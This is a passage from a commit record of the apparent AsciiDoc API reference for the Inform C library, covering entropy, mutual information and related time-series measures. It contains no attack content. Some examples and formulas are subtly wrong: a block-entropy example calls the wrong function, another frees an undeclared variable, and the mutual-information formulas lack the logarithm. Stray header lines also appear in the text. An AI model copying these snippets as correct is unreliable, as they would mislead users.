Decomposition\n\n****\n[[inform_pid_source]]\n[source,c]\n----\ntypedef struct inform_pid_source\n{\n size_t *name;\n struct inform_pid_source **above;\n struct inform_pid_source **below;\n size_t size, n_above, n_below;\n double imin;\n double pi;\n} inform_pid_source;\n----\n****\n\n****\n[[inform_pid_lattice]]\n[source,c]\n----\ntypedef struct inform_pid_lattice\n{\n inform_pid_source **sources;\n inform_pid_source *top;\n inform_pid_source *bottom;\n size_t size;\n} inform_pid_lattice;\n----\n****\n\n****\n[[inform_pid_lattice_free]]\n[source,c]\n----\nvoid inform_pid_lattice_free(inform_pid_lattice *l);\n----\n****\n\n****\n[[inform_pid]]\n[source,c]\n----\ninform_pid_lattice *inform_pid(int const *stimulus,\n int const *responses, size_t l, size_t n, int bs,\n int const *br, inform_error *err);\n----\n****\n\n[[predictive-information]]\n== Predictive Information\n\n****\n[[inform_predictive_info]]\n[source,c]\n----\ndouble inform_predictive_info(int const *series, size_t n, size_t m,\n int b, size_t kpast, size_t kfuture, inform_error *err);\n----\n****\n\n****\n[[inform_local_predictive_info]]\n[source,c]\n----\ndouble *inform_local_predictive_info(int const *series, size_t n,\n size_t m, int b, size_t kpast, size_t kfuture, double *pi,\n inform_error *err);\n----\n****\n\n[[relative-entropy]]\n== Relative Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Kullback%E2%80%93Leibler_divergence[Relative entropy], also\nknown as the Kullback-Leibler divergence, measures the amount of information gained in\nswitching from a prior distribution stem:[q_X] to a posterior distribution stem:[p_X] over\n_the same support_:\n[stem]\n++++\nD_{KL}(p||q) = \\sum_{x_i} p(x_i) \\log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nThe local counterpart is\n[stem]\n++++\nd_{KL,i}(p||q) = log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nNote that the average in moving from the local to the non-local relative entropy is taken\nover the posterior distribution.\n\nSee <<Kullback1951>> and <<Cover1991>> for more information.\n\n****\n[[inform_relative_entropy]]\n[source,c]\n----\ndouble inform_relative_entropy(int const *xs, int const *ys, size_t n,\n int b, inform_error *err);\n----\nCompute the relative entropy between time series drawn from posterior and prior\ndistributions, here `xs` and `ys` respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble re = inform_relative_entropy(xs, ys, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.278072\n\nre = inform_relative_entropy(ys, xs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.321928\n----\n****\n\n****\n[[inform_local_relative_entropy]]\n[source,c]\n----\ndouble *inform_local_relative_entropy(int const *xs, int const *ys,\n size_t n, int b, double *re, inform_error *err);\n----\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble *re = inform_local_relative_entropy(xs, ys, 10, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { 0.678, -1.322, 0.678, 0.678, 0.678, 0.678, 0.678,\n\/\/ 0.678, 0.678, -1.322 };\n\ninform_local_relative_entropy(ys, xs, 10, 2, re, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { -0.678, 1.322, 1.322, 1.322, 1.322, -0.678, -0.678, 1.322,\n\/\/ -0.678, -0.678 }\n\nfree(re);\n----\n****\n\n[[separable-information]]\n== Separable Information\n\n****\n[[inform_separable_info]]\n[source,c]\n----\ndouble inform_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_separable_info]]\n[source,c]\n----\ndouble *inform_local_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k, double *si,\n inform_error *err);\n----\n****\n\n[[transfer-entropy]]\n== Transfer Entropy\n\n****\n[[inform_transfer_entropy]]\n[source,c]\n----\ndouble inform_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_transfer_entropy]]\n[source,c]\n----\ndouble *inform_local_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n double *te, inform_error *err);\n----\n****\n","old_contents":"[[time-series-measures]]\n= Time Series Measures\n\nThe original purpose of *Inform* was to analyze time series data. This explains why most of\n*Inform*'s functionality resides in functions specifically optimized for analyzing time\nseries. The API was designed to be easy to use in C or {cpp}, or to be wrapped in a\nhigher-level language, e.g. https:\/\/elife-asu.github.io\/PyInform[Python]. This means that we\navoided some of the \"niceties\" of C, such as extensive use of macros and other generic\natrocities, in favor of wrappability. Keep this in mind as you learn the API.\n\nMany information measures have \"local\" variants which compute a time series of point-wise\nvalues. These local variants have names similar to their averaged or global counterparts,\ne.g <<inform_active_info,inform_active_info>> and\n<<inform_local_active_info,inform_local_active_info>>. We have been meticulous in ensuring\nthat function and parameter names are consistent across measures. If you notice some\ninconsistency, please https:\/\/github.com\/elife-asu\/inform\/issue[report it as an issue].\n\n[[time-series-notation]]\n== Notation\n\nThroughout the discussion of time series measures, we will try to use a consistent notation.\nWe will denote random variables as stem:[X,Y,\\ldots], and let stem:[x_i,y_i,\\ldots]\nrepresent the stem:[i]-th time step of a time series drawn from the associated random\nvariable. Many of the measures consider stem:[k]-histories (a.k.a stem:[k]-blocks) of the\ntime series, e.g. stem:[x_i^{(k)} = \\left\\{x_{i-k+1}, x_{i-k+2},\\ldots,x_i\\right\\}].\n\nWhen denoting probability distributions, we will only make the random variable explicit in\nsituations where the notation is ambiguous. We will typically write stem:[p(x_i)],\nstem:[p(x_i^{(k)})], and stem:[p(x_i^{(k)}, x_{i+1})] to denote the empirical probability\nof observing the stem:[x_i] state, the stem:[x_i^{(k)}] stem:[k]-history, and the joint\nprobability of observing stem:[\\left(x_i^{(k)}, x_{i+1}\\right)].\n\n*Please report any notational ambiguities as an\nhttps:\/\/github.com\/elife-asu\/inform\/issue[issue].*\n\n[[time-series-detail]]\n== Implementation Details\n\n=== The Base: States and Logarithms\nThe word \"base\" has two different meanings in the context of information measures on time\nseries. It could refer to the base of the time series itself, that is the number of unique\nstates in the time series. For example, the time series stem:[\\{0,2,1,0,0\\}] is a base-3\ntime series. On the other hand, it could refer to the base of the logarithm used in\ncomputing the information content of the inferred probability distributions. The problem is\nthat these two meanings clash. The base of the time series affects the range of values the\nmeasure can produce, and the base of the logarithm represents a rescaling of those values.\n\nIn this library we deal with this by *always* using base-2 logarithms, and having the user\nspecify the base of the time series \u2014 don't worry, we <<error-handling, set an error>> if\nthe provided base doesn't make sense. All of this ensures that the library is a simple as\nreasonably possible.\n\n=== Multiple Initial Conditions\nYou generally need *a lot* of data to infer a probability distribution. An experimentalist\nor simulator might then collect data over multiple trials or initial conditions. Most of\n*Inform*'s time series measures allow the user to pass in a two-dimensional, rectangular\narray which each row representing a time series from a different initial condition. From\nthis the probability distributions are inferred, and the desired value is calculated. This\nhas the downside of requiring that the user store all of the data in memory, but it has the\nadvantage of being fast and simple. Trade-offs, man...\n\nA subsequent release, https:\/\/github.com\/elife-asu\/inform\/milestone\/3[likely v1.1.0], will\nallows the initial conditions to have time series of different lengths and will provide\naccumulator implementations of all of these measures that will let the incrementally\nconstruct the distributions. This will lift some of the memory burden at the expense of\nruntime performance.\n\n=== Calling Conventions\nAll of the of the time series functions described in this section use the same basic calling\nconventions and use the same (or similar) argument names were possible.\n\n|===\n| Argument Name | Description\n\n| `series`\n| A 2-D or 3-D, finite-state time series in contiguous, row-major form\n\n| `l`\n| The number of \"sources\" or variables in a 3-D time series\n\n| `n`\n| The number of initial conditions per \"source\"\n\n| `m`\n| The number of time steps per \"source\"\n\n| `b`\n| The base of the time series\n\n| `k`\n| The length history length\n\n| `err`\n| An error argument\n|===\n\nAverage measures generally return a double-precision, floating-point value while local\nvariants return a pointer to an appropriately shaped, contiguous array. Local measures\naccept an argument, often named after the function (e.g. local active information takes an\n`ai` argument), which is used to store the computed local values. If that argument is NULL,\nthen the function allocates an array.\n\nWe will try to note any deviations from these conventions.\n\n[[active-info]]\n== Active Information\n\nActive information (AI) was introduced in <<Lizier2012>> to quantify information storage in\ndistributed computations. Active information is defined in terms of a temporally local\nvariant\n\n[stem]\n++++\na_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nwhere the probabilities are constructed empirically from the _entire_ time series. From the\nlocal variant, the temporally global active information is defined as\n\n[stem]\n++++\nA_X(k) = \\langle a_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nStrictly speaking, the local and average active information are defined as\n\n[stem]\n++++\na_{X,i} = \\lim_{k\\rightarrow \\infty}a_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nA_X = \\lim_{k\\rightarrow \\infty}A_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\n****\n[[inform_active_info]]\n[source,c]\n----\ndouble inform_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble ai = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.305958\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.359879\n----\n****\n\n****\n[[inform_local_active_info]]\n[source,c]\n----\ndouble *inform_local_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, double *ai, inform_error *err);\n----\nCompute the local active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *ai = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ {-0.193, 0.807, 0.222, 0.222, -0.363, 1.222, 0.222}\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai[14];\ninform_local_active_info(series, 2, 9, 2, 2, ai, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ { 0.807, -0.363, 0.637, 0.637, -0.778, 0.807, -1.193,\n\/\/ 0.807, 0.807, 0.222, 0.807, 0.807, 0.222, 0.807 }\n\n\/\/ no need to free since `ai` was statically allocated in this scope\n\/\/ free(ai);\n----\n****\n\n[[block-entropy]]\n== Block Entropy\nBlock entropy, also known as stem:[N]-gram entropy <<Shannon1948>>, is the standard Shannon\nentropy of the stem:[k]-histories of a time series:\n[stem]\n++++\nH(X^{(k)}) = -\\sum_{x_i^{(k)}} p(x_i^{(k)}) \\log_2{p(x_i^{(k)})}\n++++\nwhich reduces to the traditional Shannon entropy for stem:[k=1].\n\n****\n[[inform_block_entropy]]\n[source,c]\n----\ndouble inform_block_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k = 1\ndouble h = inform_block_entropy(series, 1, 9, 2, 1, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 0.991076\n\n\/\/ k = 2\nh = inform_block_entropy(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.811278\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.936278\n----\n****\n\n****\n[[inform_local_block_entropy]]\n[source,c]\n----\ndouble *inform_local_block_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ent, inform_error *err);\n----\nCompute the local block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k == 1\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 1, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 0.848, 0.848, 1.170, 1.170, 1.170, 1.170, 0.848, 0.848, 0.848 }\n\n\/\/ k == 2\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 3.000, 1.415, 1.415, 1.415, 3.000, 1.415, 1.415 }\n\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h[16];\ninform_local_block_entropy(series, 2, 9, 2, 2, h, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 2.415, 2.415, 2.415, 2.415, 2.000, 1.415, 1.415,\n\/\/ 2.000, 1.415, 2.415, 2.000, 1.415, 2.415, 2.000, 1.415 }\n\n\/\/ no need to free since `h` was statically allocated in this scope\n\/\/ free(h);\n----\n****\n\n[[conditional-entropy]]\n== Conditional Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Conditional_entropy[Conditional entropy] is a measure of the\namount of information required to describe a random variable stem:[Y] given knowledge of\nanother random variable stem:[X]. When applied to time series, two time series are used to\nconstruct the empirical distributions, and <<inform_shannon_ce,inform_shannon_ce>> can be\napplied to yield\n[stem]\n++++\nH(Y|X) = - \\sum_{x_i,y_i} p(x_i,y_i) \\log_2{p(y_i|x_i)}.\n++++\nThis can be viewed as the time-average of the local conditional entropy\n[stem]\n++++\nh_i(Y|X) = -\\log_2{p(y_i|x_i)}.\n++++\nSee <<Cover1991>> for more information.\n\n****\n[[inform_conditional_entropy]]\n[source,c]\n----\ndouble inform_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, inform_error *err);\n----\nCompute the conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble ce = inform_conditional_entropy(xs, ys, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.597107\n\nce = inform_conditional_entropy(ys, xs, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.507757\n----\n****\n\n****\n[[inform_local_conditional_entropy]]\n[source,c]\n----\ndouble *inform_local_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, double *mi, inform_error *err);\n----\nCompute the local conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble *ce = inform_local_conditional_entropy(xs, ys, 20, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 3.00, 3.00, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19,\n\/\/ 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.42, 0.42, 0.42, 2.00 }\n\ninform_local_conditional_entropy(ys, xs, 20, 2, 2, ce, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 1.32, 1.32, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10,\n\/\/ 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.74, 0.74, 0.74, 3.91 }\n\nfree(ce);\n----\n****\n\n[[cross-entropy]]\n== Cross Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Cross_entropy[Cross entropy] between two distributions\nstem:[p_X] and stem:[q_X] measures the amount of information needed to identify events\nusing a coding scheme optimized for stem:[q_X] when stem:[p_X] is the \"real\" distributions\nover stem:[X].\n[stem]\n++++\nH(p,q) = -\\sum_{x} p(x) \\log_2{q(x)}\n++++\nCross entropy's local variant is equivalent to the self-information of stem:[q_X], and as\nsuch is implemented by <<inform_local_block_entropy,inform_local_block_entropy>>.\n\nSee <<Cover1991>> for more details.\n****\n[[inform_cross_entropy]]\n[source,c]\n----\ndouble inform_cross_entropy(int const *ps, int const *qs, size_t n,\n int b, inform_error *err);\n----\nCompute the cross entropy between the \"true\" and \"unnatural\" distributions stem:[p_X] and\nstem:[q_X] from associated time series `ps` and `qs`, respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const ps[10] = {0,1,1,0,1,0,0,1,0,0};\nint const qs[10] = {0,0,0,0,0,1,1,0,0,1};\n\ndouble ce = inform_cross_entropy(ps, qs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 1.003530\n\nce = inform_cross_entropy(qs, ps, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.912454\n----\n****\n\n[[effective-information]]\n== Effective Information\n\n****\n[[inform_effective_info]]\n[source,c]\n----\ndouble inform_effective_info(double const *tpm, double const *inter,\n size_t n, inform_error *err);\n----\n****\n\n[[entropy-rate]]\n== Entropy Rate\nhttps:\/\/en.wikipedia.org\/wiki\/Entropy_rate[Entropy rate] quantifies the amount of\ninformation needed to describe the next state of stem:[X] given observations of\nstem:[X^{(k)}]. In other wrods, it is the entropy of the time series conditioned on the\nstem:[k]-histories. The local entropy rate\n[stem]\n++++\nh_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\ncan be averaged to obtain the global entropy rate\n[stem]\n++++\nH_X(k) = \\langle h_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\nMuch as with <<active-info, active information>>, the local and average entropy rates are\nformally obtained in the limit\n[stem]\n++++\nh_{X,i} = \\lim_{k\\rightarrow \\infty}h_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nH_X = \\lim_{k\\rightarrow \\infty}H_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_entropy_rate]]\n[source,c]\n----\ndouble inform_entropy_rate(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble er = inform_entropy_rate(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.679270\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er = inform_entropy_rate(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.625349\n----\n****\n\n****\n[[inform_local_entropy_rate]]\n[source,c]\n----\ndouble *inform_local_entropy_rate(int const *series, size_t n,\n size_t m, int b, size_t k, double *er, inform_error *err);\n----\nCompute the local entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *er = inform_local_entropy_rate(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 1.000, 0.000, 0.585, 0.585, 1.585, 0.000, 1.000 }\nfree(er);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er[14];\ninform_local_entropy_rate(series, 2, 9, 2, 2, er, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 0.415, 1.585, 0.585, 0.585, 1.585, 0.000, 2.000,\n\/\/ 0.000, 0.415, 0.585, 0.000, 0.415, 0.585, 0.000 }\n\n\/\/ no need to free since `er` was statically allocated in this scope\n\/\/ free(er);\n----\n****\n\n[[excess-entropy]]\n== Excess Entropy\n\n****\n[[inform_excess_entropy]]\n[source,c]\n----\ndouble inform_excess_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\n****\n\n****\n[[inform_local_excess_entropy]]\n[source,c]\n----\ndouble *inform_local_excess_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ee, inform_error *err);\n----\n****\n\n[[information-flow]]\n== Information Flow\n\n****\n[[inform_information_flow]]\n[source,c]\n----\ndouble inform_information_flow(int const *src, int const *dst,\n int const *back, size_t l_src, size_t l_dst, size_t l_back,\n size_t n, size_t m, int b, inform_error *err);\n----\n****\n\n[[evidence-of-integration]]\n== Evidence Of Integration\n\n****\n[[inform_integration_evidence]]\n[source,c]\n----\ndouble *inform_integration_evidence(int const *series, size_t l,\n size_t n, int const *b, double *evidence, inform_error *err);\n----\n****\n\n****\n[[inform_integration_evidence_part]]\n[source,c]\n----\ndouble *inform_integration_evidence_part(int const *series, size_t l,\n size_t n, int const *b, size_t const *parts, size_t nparts,\n double *evidence, inform_error *err);\n----\n****\n\n[[mutual-information]]\n== Mutual Information\nhttps:\/\/en.wikipedia.org\/wiki\/Mutual_information[Mutual information] (MI) is a measure of\nthe amount of mutual dependence between at least two random variables. Locally, MI is\ndefined as\n[stem]\n++++\ni_i(X_1,\\ldots,X_l) = \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nThe mutual information is then just the time average of stem:[i_i(X_1,\\ldots,X_l)]:\n[stem]\n++++\nI(X_1,\\ldots,X_l) =\n \\sum_{x_{1,i},\\ldots,x_{l,i}} p(x_{1,i},\\ldots,x_{l,i}) \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nSee <<Cover1991>> for more details.\n\n****\n[[inform_mutual_info]]\n[source,c]\n----\ndouble inform_mutual_info(int const *series, size_t l, size_t n,\n int const *b, inform_error *err);\n----\nCompute the mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble mi = inform_mutual_info(xs, 2, 20, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 0.214171\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\ndouble mi = inform_mutual_info(xs, 3, 20, (int[3]){2,2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 1.095462\n----\n****\n\n****\n[[inform_local_mutual_info]]\n[source,c]\n----\ndouble *inform_local_mutual_info(int const *series, size_t l, size_t n,\n int const *b, double *mi, inform_error *err);\n----\nCompute the local mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble *mi = inform_local_mutual_info(xs, 2, 20, (int[2]){2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { -1.000, -1.000, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 1.585, 1.585, 1.585, -1.585 }\nfree(mi);\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\n\ndouble *mi = inform_local_mutual_info(xs, 3, 20, (int[3]){2,2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 3.322, 3.322, 0.322, 0.152 }\nfree(mi);\n----\n****\n\n[[partial-information-decomposition]]\n== Partial Information Decomposition\n\n****\n[[inform_pid_source]]\n[source,c]\n----\ntypedef struct inform_pid_source\n{\n size_t *name;\n struct inform_pid_source **above;\n struct inform_pid_source **below;\n size_t size, n_above, n_below;\n double imin;\n double pi;\n double info;\n} inform_pid_source;\n----\n****\n\n\n\n\ninform_pid_lattice *inform_pid(int const *stimulus, int const *responses,\n size_t l, size_t n, int bs, int const *br, inform_error *err);\n\n#ifdef __cplusplus\n}\n#endif\n\n****\n[[inform_pid_lattice]]\n[source,c]\n----\ntypedef struct inform_pid_lattice\n{\n inform_pid_source **sources;\n inform_pid_source *top;\n inform_pid_source *bottom;\n size_t size;\n} inform_pid_lattice;\n----\n****\n\n****\n[[inform_pid_lattice_free]]\n[source,c]\n----\nvoid inform_pid_lattice_free(inform_pid_lattice *l);\n----\n****\n\n****\n[[inform_pid]]\n[source,c]\n----\ninform_pid_lattice *inform_pid(int const *stimulus,\n int const *responses, size_t l, size_t n, int bs,\n int const *br, inform_error *err);\n----\n****\n\n[[predictive-information]]\n== Predictive Information\n\n****\n[[inform_predictive_info]]\n[source,c]\n----\ndouble inform_predictive_info(int const *series, size_t n, size_t m,\n int b, size_t kpast, size_t kfuture, inform_error *err);\n----\n****\n\n****\n[[inform_local_predictive_info]]\n[source,c]\n----\ndouble *inform_local_predictive_info(int const *series, size_t n,\n size_t m, int b, size_t kpast, size_t kfuture, double *pi,\n inform_error *err);\n----\n****\n\n[[relative-entropy]]\n== Relative Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Kullback%E2%80%93Leibler_divergence[Relative entropy], also\nknown as the Kullback-Leibler divergence, measures the amount of information gained in\nswitching from a prior distribution stem:[q_X] to a posterior distribution stem:[p_X] over\n_the same support_:\n[stem]\n++++\nD_{KL}(p||q) = \\sum_{x_i} p(x_i) \\log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nThe local counterpart is\n[stem]\n++++\nd_{KL,i}(p||q) = log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nNote that the average in moving from the local to the non-local relative entropy is taken\nover the posterior distribution.\n\nSee <<Kullback1951>> and <<Cover1991>> for more information.\n\n****\n[[inform_relative_entropy]]\n[source,c]\n----\ndouble inform_relative_entropy(int const *xs, int const *ys, size_t n,\n int b, inform_error *err);\n----\nCompute the relative entropy between time series drawn from posterior and prior\ndistributions, here `xs` and `ys` respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble re = inform_relative_entropy(xs, ys, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.278072\n\nre = inform_relative_entropy(ys, xs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.321928\n----\n****\n\n****\n[[inform_local_relative_entropy]]\n[source,c]\n----\ndouble *inform_local_relative_entropy(int const 